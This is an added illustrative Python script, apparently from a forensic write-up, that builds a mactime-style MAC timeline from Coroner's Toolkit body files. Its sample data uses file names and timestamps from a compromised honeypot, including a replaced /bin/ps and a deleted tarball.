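The script below is an added example, not part of the original submission and not TCT's mactime. It shows what mactime does with the body files merged in question 3: each record contributes up to three events (mtime, atime, ctime), events are bucketed by timestamp, and a file whose times coincide gets combined flags such as "mac" (a fresh copy) or "..c" (only chmod/chown/rename). It assumes the 16-field, pipe-separated body format written by grave-robber and ils2mac (md5|file|st_dev|st_ino|st_mode|st_ls|st_nlink|st_uid|st_gid|st_rdev|st_size|st_atime|st_mtime|st_ctime|st_blksize|st_blocks); check that field order against the mactime script in your TCT tree before running it on real output. Times are rendered in UTC, whereas mactime uses the local zone of the analysis host. SAMPLE_BODY is constructed from the timestamps discussed in question 3 and is not copied from the image: the dead-inode name mimics the <device-dead-N> form that ils2mac gives unallocated inodes, and the inode numbers of the live files are made up.

```python
"""Build a mactime-style timeline from TCT body records.

Added example; not part of the original submission and not TCT code.
"""
from collections import defaultdict
from datetime import datetime, timezone

# Field indexes of the assumed 16-field body format.
F_FILE, F_LS, F_UID, F_GID, F_SIZE, F_ATIME, F_MTIME, F_CTIME = 1, 5, 7, 8, 10, 11, 12, 13


def ts(text):
    """'YYYY-MM-DD HH:MM:SS' (UTC) -> epoch seconds, as stored in a body file."""
    return int(datetime.strptime(text, "%Y-%m-%d %H:%M:%S")
               .replace(tzinfo=timezone.utc).timestamp())


def parse_body(text):
    """Yield (name, size, ls-mode, uid, gid, atime, mtime, ctime) per record.
    grave-robber prefixes its body with a 'class|host|start_time' header and
    a column-name line; both are skipped, as is any line of the wrong width."""
    for line in text.splitlines():
        fields = line.rstrip("\n").split("|")
        if len(fields) < 14 or fields[0] == "md5":
            continue
        yield (fields[F_FILE], int(fields[F_SIZE]), fields[F_LS], fields[F_UID],
               fields[F_GID], int(fields[F_ATIME]), int(fields[F_MTIME]),
               int(fields[F_CTIME]))


def build_timeline(text, since=0):
    """Return [(epoch, flags, size, mode, uid, gid, name)] sorted by time, then
    name. flags holds 'm', 'a', 'c' or '.' in that order, so identical times
    show as 'mac' and a bare inode change as '..c'. Events before `since`
    are dropped, which is what the start date on mactime's command line does."""
    buckets = defaultdict(dict)          # epoch -> name -> [flags, size, mode, uid, gid]
    for name, size, mode, uid, gid, atime, mtime, ctime in parse_body(text):
        for pos, t in ((0, mtime), (1, atime), (2, ctime)):
            if t < since:
                continue
            flags = buckets[t].setdefault(name, [["."] * 3, size, mode, uid, gid])[0]
            flags[pos] = "mac"[pos]
    return [(t, "".join(e[0]), e[1], e[2], e[3], e[4], n)
            for t in sorted(buckets) for n, e in sorted(buckets[t].items())]


def format_timeline(rows):
    """Render like mactime: the timestamp is printed only when it changes."""
    out, last = [], None
    for t, flags, size, mode, uid, gid, name in rows:
        stamp = datetime.fromtimestamp(t, timezone.utc).strftime("%b %d %y %H:%M:%S")
        out.append(f"{stamp if t != last else ' ' * len(stamp)} {size:>8} {flags} "
                   f"{mode} {uid:<6} {gid:<6} {name}")
        last = t
    return "\n".join(out)


def _rec(name, ino, ls, size, atime, mtime, ctime):
    """One constructed body record (md5, dev, mode bits and block counts zeroed)."""
    return f"0|{name}|0|{ino}|0|{ls}|1|0|0|0|{size}|{ts(atime)}|{ts(mtime)}|{ts(ctime)}|4096|0"


# Constructed sample: the deleted tarball (inode 23), the replaced /bin/ps, the
# /dev/rpm config file and the modified rc.sysinit. Live-file inode numbers are made up.
SAMPLE_BODY = "\n".join([
    "class|host|start_time",
    "body|uakti|984700000",
    "md5|file|st_dev|st_ino|st_mode|st_ls|st_nlink|st_uid|st_gid|st_rdev|st_size"
    "|st_atime|st_mtime|st_ctime|st_blksize|st_blocks",
    _rec("<honeypot.hda8.dd-dead-23>", 23, "-rw-r--r--", 520333,
         "2001-03-15 22:44:50", "2001-03-15 22:36:48", "2001-03-15 22:45:05"),
    _rec("/bin/ps", 40001, "-rwxr-xr-x", 33280,
         "2001-03-15 22:44:50", "2001-03-02 12:00:00", "2001-03-15 22:45:02"),
    _rec("/dev/rpm", 40002, "-rw-r--r--", 71,
         "2001-03-15 22:45:02", "2001-03-15 22:45:02", "2001-03-15 22:45:02"),
    _rec("/etc/rc.d/rc.sysinit", 40003, "-rwxr-xr-x", 13708,
         "2001-03-14 10:00:00", "2001-03-15 22:45:03", "2001-03-15 22:45:03"),
])

if __name__ == "__main__":
    print(format_timeline(build_timeline(SAMPLE_BODY, since=ts("2001-03-15 00:00:00"))))
```

Running it prints the seven events that question 3 walks through: the tarball's mtime at 22:36:48, its access together with /bin/ps at 22:44:50, /dev/rpm appearing as "mac" at 22:45:02, and rc.sysinit as "m.c" one second later. With since=0 the two earlier events in the constructed data (the original mtime of /bin/ps and the previous read of rc.sysinit) reappear, which is why mactime is normally given a start date: on a real body file those pre-incident events number in the thousands.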